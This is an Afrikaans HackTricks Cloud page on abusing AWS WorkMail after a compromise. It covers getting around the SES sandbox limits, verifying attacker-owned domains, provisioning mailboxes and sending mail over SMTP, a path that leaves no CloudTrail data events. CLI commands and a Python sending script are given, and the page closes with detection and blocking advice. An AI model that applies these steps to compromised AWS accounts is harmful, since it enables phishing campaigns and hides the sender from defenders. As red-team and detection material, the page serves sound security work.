AWS - WorkMail Post Exploitation

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Kyk na die subscription plans!

Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.

Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.

Abusing WorkMail to bypass SES sandbox

Selfs as SES vassteek in die sandbox (slegs geverifieerde ontvangers, ~200 msgs/24h, 1 msg/s), het WorkMail geen ekwivalente beperking nie. ’n Aanvaller met langtermynsleutels kan weggooibare e-pos-infrastruktuur opstel en dadelik begin stuur:

Create a WorkMail org (region-scoped)

aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>

Verify attacker-controlled domains (WorkMail invokes SES APIs as workmail.amazonaws.com):

aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com

Provision mailbox users and register them:

aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com

Notes:

Standaard ontvangerlimiet gedokumenteer deur AWS: 100,000 eksterne ontvangers/dag per org (geaggregeer oor gebruikers).
Domeinverifikasie-aktiwiteit sal in CloudTrail onder SES verskyn maar met invokedBy: workmail.<region>.amazonaws.com, dus kan SES-verifikasiegebeurtenisse tot ’n WorkMail-opstelling behoort in plaas van SES-veldtogte.
WorkMail posbusgebruikers word application-layer persistence onafhanklik van IAM-gebruikers.

Verstuurpade & telemetrie-leemtes

Web client (WorkMail UI)

Stuur-aksies verskyn as ses:SendRawEmail gebeurtenisse in CloudTrail.
userIdentity.type = AWSService, invokedBy/sourceIPAddress/userAgent = workmail.<region>.amazonaws.com, dus is die werklike kliënt-IP versteek.
requestParameters still leak sender (source, fromArn, sourceArn, configuration set) om te korreleer met nuut geverifieerde domeine/posbusse.

SMTP (mees onopvallend)

Eindpunt: smtp.mail.<region>.awsapps.com:465 (SMTP oor SSL) met die posbus-wagwoord.
Daar word geen CloudTrail-data-gebeurtenisse gegenereer vir SMTP-aflewering nie, selfs wanneer SES-data-gebeurtenisse geaktiveer is.
Ideale opsporingspunte is org/domein/gebruikersprovisionering en SES identity ARNs wat verwys word in daaropvolgende web-gestuurde SendRawEmail gebeurtenisse.

Voorbeeld SMTP-stuur via WorkMail

```python import smtplib from email.message import EmailMessage

SMTP_SERVER = “smtp.mail.us-east-1.awsapps.com” SMTP_PORT = 465 EMAIL_ADDRESS = “marketing@attacker-domain.com” EMAIL_PASSWORD = “SuperSecretPassword!”

target = “victim@example.com” # can be unverified/external msg = EmailMessage() msg[“Subject”] = “WorkMail SMTP” msg[“From”] = EMAIL_ADDRESS msg[“To”] = target msg.set_content(“Delivered via WorkMail SMTP”)

with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp: smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD) smtp.send_message(msg)

</details>

## Opsporingsoorwegings

- As WorkMail onnodig is, blokkeer dit via **SCPs** (`workmail:*` deny) op organisasievlak.
- Waarsku oor provisionering: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, and SES verifications with `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Let op abnormale **`ses:SendRawEmail`**-gebeure waar die identity ARNs na nuwe domeine verwys en die bron IP/UA gelyk is aan `workmail.<region>.amazonaws.com`.

## Verwysings

- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)

> [!TIP]
> Leer & oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Ondersteun HackTricks</summary>
>
> - Kyk na die [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Sluit aan by die** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) of die [**telegram group**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Deel hacking tricks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>